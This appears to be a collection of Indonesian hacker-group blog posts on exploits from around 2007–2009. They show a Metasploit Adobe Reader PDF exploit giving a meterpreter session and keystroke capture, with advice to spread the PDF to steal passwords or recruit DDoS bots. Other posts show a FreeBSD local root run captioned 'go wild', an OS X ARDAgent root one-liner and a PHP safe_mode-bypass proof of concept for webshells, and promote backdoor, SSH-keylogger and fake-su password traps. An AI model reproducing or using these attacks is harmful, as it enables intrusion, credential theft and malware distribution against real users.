Kecoak Elektronik Indonesia

Salah satu artis yang terkenal dengan istilah ‘bechek’-nya pernah bilang dalam salah satu sesi wawancara untuk “acara televisi full of non-sense but terribly popular” (attention: something called infoblabla) bahwa twitter, facebook, friendster itu gak ada gunanya. Do’i gak mungkin ikutan begituan karena terlalu sibuk dengan skull, corse, blablabla. Dan yang ikutan begituan (attention: geek said, social networking) hanya orang-orang yang gak punya kerjaan.

Well, somehow, this cute little girl *heh??* probably right.

Unfortunately, gak semua orang update status untuk hal-hal yang tidak perlu. Komunitas security umumnya seringkali memposting hal-hal yang bermanfaat, dan lebih cepat mendapatkan informasi tersebut dibandingkan menunggu muncul di blog, news, forum, dll. Beberapa hal menarik diantaranya diskusi kecil-kecilan mengenai bug dan expl0it.

Baru-baru ini merebak mengenai adobe acrobat reader 0day, salah satu yang membahas bisa lihat di http://bit.ly/7UjG26. HDM dalam twitter nya pernah meminta contoh exploit tersebut bagi siapa saja yang memilikinya, dan dalam waktu singkat contoh 0day sploit tersebut didapatkan, copy nya bisa di download dari http://bit.ly/5VqgVv. Dan tentu saja dalam beberapa jam exploit tersebut muncul dalam repo metasploit, let’s give it a try:

Snow $ sudo ./msfconsole
Password:

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

       =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 476 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7893 updated today (2009.12.16)

msf  > version
Framework: 3.3.3-dev.7817
Console  : 3.3.3-dev.7855
msf > use windows/fileformat/adobe_media_newplayer
msf exploit(adobe_media_newplayer) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(adobe_media_newplayer) > set RHOST 172.16.30.129
RHOST => 172.16.30.129
msf exploit(adobe_media_newplayer) > exploit

[*] Started bind handler
[*] Creating 'msf.pdf' file...
[*] Generated output file /Applications/Metasploit/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.

Dear newbie, silahkan copy file msf.pdf ke komputer target untuk dibuka menggunakan adobe acrobat reader. Dalam eksperimen ini saya menggunakan adobe acrobat reader versi 9.1.0 di windows XP SP3 (non DEP).

msf exploit(adobe_media_newplayer) > exploit

[*] Started bind handler
[*] Creating 'msf.pdf' file...
[*] Generated output file /Applications/Metasploit/data/exploits/msf.pdf
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (172.16.30.1:57665 -> 172.16.30.129:4444)

meterpreter > idletime
User has been idle for: 2 mins 25 secs
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
www.google.com
meterpreter > ctrl-z
Background session 1? [y/N]

Well, tentu saja dry joke (talking ’bout artist di blog kecoak???) di malam hari menjelang tidur ini bukan untuk high skilled exploiter. Hanya menunjukan sedikit mainan dari exploit terbaru Adobe acrobat reader menggunakan metasploit framework. Dalam contoh diatas tentu saja tidak selalu harus untuk kepentingan RCE (Remote Command Execution), bisa di-imajinasikan jika payload yang digunakan adalah “windows/download_exec” dari url tertentu dimana pada url tersebut telah tersimpan worm, program kecil pencuri password (paypal, email, facebook, banking), program kecil pencuri keystroke di windows, program kecil yang dapat men-scan document untuk mencari data tertentu (misal: doc pemerintahan, bisnis), ataupun sekedar bot untuk menjadi slave serangan ddos.

Cukup sebar file .pdf tersebut melalui email, irc, milist, forum, facebook, dll. Dan dalam sekejap, banyak hal yang kita inginkan bisa didapatkan. Itu sebabnya vuln dari software seperti adobe acrobat reader yang notabene pasti ada di setiap komputer windows sangat berbahaya, berbagai level dan kalangan menggunakan aplikasi tersebut, sehinggal 0day nya akan berakibat fatal.

So, take care, fellas!

King Cope publish local exploit ini ke FD-Lists.

[bofh@begok ~/hack]$ uname -a
FreeBSD begok.xxxx.de 7.0-STABLE FreeBSD 7.0-STABLE #1: Fri Mar 27 11:24:51 WIT 2009     root@begok.xxxxx.de:/usr/obj/usr/src/sys/BEGOK  i386
[bofh@begok ~/hack]$ ./fbsd-local-2009.sh
fbsd-local-2009.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
8:35
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1007(bofh) gid=1007(bofh) euid=0(root) groups=1007(bofh)

Publikasi ini jelas akan langsung dimanfaatkan dengan cepat oleh para hacker/cracker yang bisa mendapatkan akses local ke mesin-mesin FreeBSD. Rasanya belum ada patch untuk saat ini. So, go wild guys? :p.

** Thanks buat temon untuk testing exploitnya, as currently I don’t have FBSD to test. *sigh*.

Tavis Ormandy mengeluarkan advisories mengenai NULL pointer dereference vulnerability pada implementasi socket untuk kernel Linux 2.6 dan 2.4. Full advisoriesnya dapat dilihat pada FD-list. Spender dari grsecurity project merilis exploit untuk bug ini dengan memanfaatkan pulseaudio seperti rilis exploit sebelumnya. Jadi jika ada yang memiliki server dengan pulseaudio versi lama dan belum di patch, serta mengaktifkan modul-modul yang vulnerable terhadap hole ini, sebaiknya melakukan uji coba terhadap server tersebut, paling tidak dengan exploit spender yang kemungkinan besar akan digunakan begitu saja oleh script kiddies.

Uninstall pulseaudio jika tidak digunakan, atau merubah pathnya dari default mungkin akan mengurangi dampak serangan para script kiddies. Beberapa tindakan pencegahan dapat dilakukan, namun yang pasti SELinux tidak dapat menolong banyak karena pada exploit ini terdapat implementasi untuk bypass SELinux .

~ GS

Menjelang Security Conference BlackHat 2009 di Las Vegas, ZFO memberi sambutan yang cukup hangat dengan me-release Ezine mereka yang ke-5. Salah satu mirror-nya bisa di lihat disini. Seperti-nya gerakan para Undergrounders seperti 5-6 tahun yang lalu bakal mulai terulang. Seruu….

Jika dilihat dari log yang mereka tuliskan dihalaman deface sepertinya lagi-lagi hasil dari 0day openssh. Log lengkapnya bisa dilihat dari FD-List. Potongan screenshot bisa dilihat dari sini.

Thanks cybertank yang masih sempat ambil screenshot nya .

$ osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘
root

Simple, tapi critical. Untuk yang menggunakan OS X dan masih mendapatkan response dari shell seperti diatas ada baiknya mengikuti workaround dari http://www.tuaw.com/ardfix/. Walaupun banyak pendapat yang mengatakan bugs ini butuh ‘physical access’, tapi tetap saja setuid root vulnerability ini bisa jadi jalan masuk trojan melalui web, yang pasti bisa melakukan banyak hal tanpa password.

Hail hackers, getting drunk last night?enjoy the party?following to count-down the silly clock?c’mon, whatever you did New TokET (Volume 3) of Kecoak Elektronik Indonesia is available for you as 2008’s new years present. Here’s some of our special menu:

[*] The Art of Beeing Invisible – ByteKrew
Kreatifitas pemasangan backdoor dan keylog untuk keperluan massive gaining server. Stealth – anonym backdooring dengan kombinasi penjelasan konsep dan teknikal.

[*] Perkenalan Terhadap Insiden – BytesKrew
Pengenalan terhadap insiden cyber dan bagaimana merespon sebuah insiden serta membangun pertahanan dan system logging untuk meminimalkan resiko sebuah insiden.

[*] Fuzzer dan Teknologi Security – Cyb3rh3b
Otomatisasi pencarian flaw pada suatu aplikasi menggunakan fuzzer. Pembahasan dari konsep fuzzer sederhana diteruskan ke fuzzer public release.

[*] SSH Client keylogger patch – BytesKrew
Modifikasi ssh client OpenSSH 3.9p1 OpenSSH 4.5p1 dan OpenSSH 4.7p1 untuk keperluan keylogging username dan password outgoing login SSH.

[*] Keylogging Root Password with Evil su – csh
Trapdoor menggunakan fake su command. Get the password – compromise the root.

Grab the complete links from here.

Well…WabiSabi Labi, industri baru yang dibungkus dengan nuansa dan inovasi baru sebagai tempat penjualan 0day sepertinya harus menunda pesta meriahnya. Roberto Preatoni, salah satu co-founder dan direktur strategi perusahaan ini plus founder dari Zone-H ditangkap di italy atas kasus skandal berupa penyadapan terhadap Telecom Italy.

Penangkapan preatoni tidak ada sangkut pautnya dengan pasar jual-beli 0day tersebut, preatoni ditangkap berhubungan dengan pekerjaannya sebagai security consultant. Telecom italy menggunakan tenaga preatoni beserta “tiger team”-nya sebagai security expert untuk melakukan proses penetration testing terhadap tingkat security IT perusahaan tersebut. Namun anggota tiger team ini ketahuan memasang trojan horse dan melakukan penyadapan data-data rahasia terhadap sejumlah orang penting, diantaranya CEO dari Brazil Telecom. Preatoni diduga membantu proses setting-up aksi skandal ini saat sedang melakukan pekerjaannya sebagai security consultant.

Aksi skandal ini memang tidak berhubungan dengan WabiSabi Labi, namun secara tidak langsung akan berpengaruh pada kredibilitas market tersebut. Konsep WabiSabi Labi sebenarnya tidak jauh berbeda dengan perusahaan-perusahaan seperti 3Com, iDefense, Immunity yang membayar *researcher* untuk menyediakan 0day. Namun industri-industri tersebut umumnya membeli exploit untuk kemudian dilaporkan kepada vendor yang bersangkutan, dengan kata lain industri-industri tersebut bisa menjadi media/jembatan antara pihak yang menemukan vulnerability suatu aplikasi dengan vendor yang memproduksi aplikasi tersebut, dan tentu saja ada imbalan yang akan diberikan kepada si penemu vulnerability untuk jerih payahnya melakukan riset dalam menemukan bugs (fuzzer, hunneh?!).

WabiSabi Labi merupakan industri yang membuka pasar secara lebih terbuka, dalam arti…jika kamu memiliki sebuah 0day, maka kamu bisa menjualnya melalui WabiSabi Labi dan ditawarkan kepada pembeli secara bebas (aha, teringat dengan pasar darknet?), siapapun bisa membayar untuk exploit tersebut. Dan mekanismenya bahkan lebih eksklusif, yaitu pembeli 0day bisa menentukan eksklusifitas-nya dimana WabiSabi Labi tidak akan menjual 0day tersebut kepada pihak lain, jadi hanya pembeli eksklusif itulah yang memiliki 0day itu.

Hal lain nya?WabiSabi Labi juga akan menjadi vendor penyedia produk IDS (Intrusion Detection System) yang bekerja sama dengan produsen hardware tertentu untuk menyediakan produk ini, dan signature untuk IDS ini menggunakan database 0day yang diperjual belikan pada pasar WabiSabi Labi. Tentu saja, si penyumbang eksploit akan mendapatkan semacam royalti selama 0day nya masih ada di database dan digunakan oleh client. Dengan memanfaatkan WabiSabi Labi maka para penyumbang 0day (call it researcher, or…blackhat or..whatever):

1. Akan mendapatkan bayaran atas jerih payah nya (dlm hal ini Wabi bertindak sebagai broker), jumlah nya pun mungkin bisa jadi lebih besar dibandingkan menggunakan jasa iDefense dll (jelas, karena pihak pembeli bisa siapapun, termasuk organisasi kriminal yang ingin mendapatkan akses ssh ke bank, misalnya ).
2. WabiSabi Labi pun dalam hal ini akan bertindak sebagai vendor security penyedia produk dengan signature database 0day yang belum di-publish dimanapun (ini teknik marketing baru yang cerdik untuk menarik banyak client ).
3. Buat kamu-kamu yang punya 0day pun akan mendapatkan royalti selama signature database nya masih digunakan oleh client, berarti duit ngalir dan riset tidak sia-sia (duit..duit..duit..duit.. ).
4. Dll

Itu sekelumit cerita tentang WabiSabi Labi dan Roberto Preatoni sebagai salah satu founder nya, yang ternyata harus di-busted akibat tuduhan membantu setting-up skandal pemasangan trojan dan penyadapan data-data penting saat diberikan kepercayaan untuk melakukan audit security. Yang pasti, akibat kejadian ini mungkin pihak vendor akan lebih berhati-hati saat menyewa security consultant, bisa jadi mereka menyewa maling yang berkostum polisi .

So, ada yang tertarik bermain di WabiSabi Labi untuk duit tambahan?atau lebih suka memamerkan exploit di milw0rm/bugtraq dengan quote shout yang panjang namun inti exploit cuma 3 baris?atau lebih memilih masuk dalam kegelapan dunia underground dan bertransaksi disana?atau…cukup simpan sendiri dan menikmati keluar masuk server pemerintah kemudian baca email-email mereka maupun digunakan untuk kampanye umum (DEFACE!!!) melakukan protes terhadap negara lain misalnya?

Well, the choice is yours, you guys know who you are… =))

Someone /at/ kecoak elektronik just lost his private 0day, the 0day technique to bypass safemode php and apache chroot using mysql has been leaked and publish on public disclosure site. No need to keep it anymore, so he just released the PoC to the public:

——————- Cut here ————————

<?php
/*
It has been a while i make this exploit to be a private collection
I use this exploit to bypass :
- Safe_mode PHP all version
- By default install apache in OpenBSD 3.x (dunno exactly) is chroot in /var/www/
Tested :
Ubuntu 6.06 – Fedora Core 5 – OpenBSD 3.9
By : Someone [at] k-elektronik
*/

echo “safe_mode = ” . ini_get(’safe_mode’) . “\n”;
$conn = mysql_connect(”localhost”, “root”, “rahasia”);
$result = mysql_query(”select load_file(\”/etc/passwd\”) as password”);
while($row = mysql_fetch_object($result))
echo $row->password;

?>

——————- Cut here ————————

Just play around do_system() function to get the system command executed. Take the vi and put those function on ur webshell.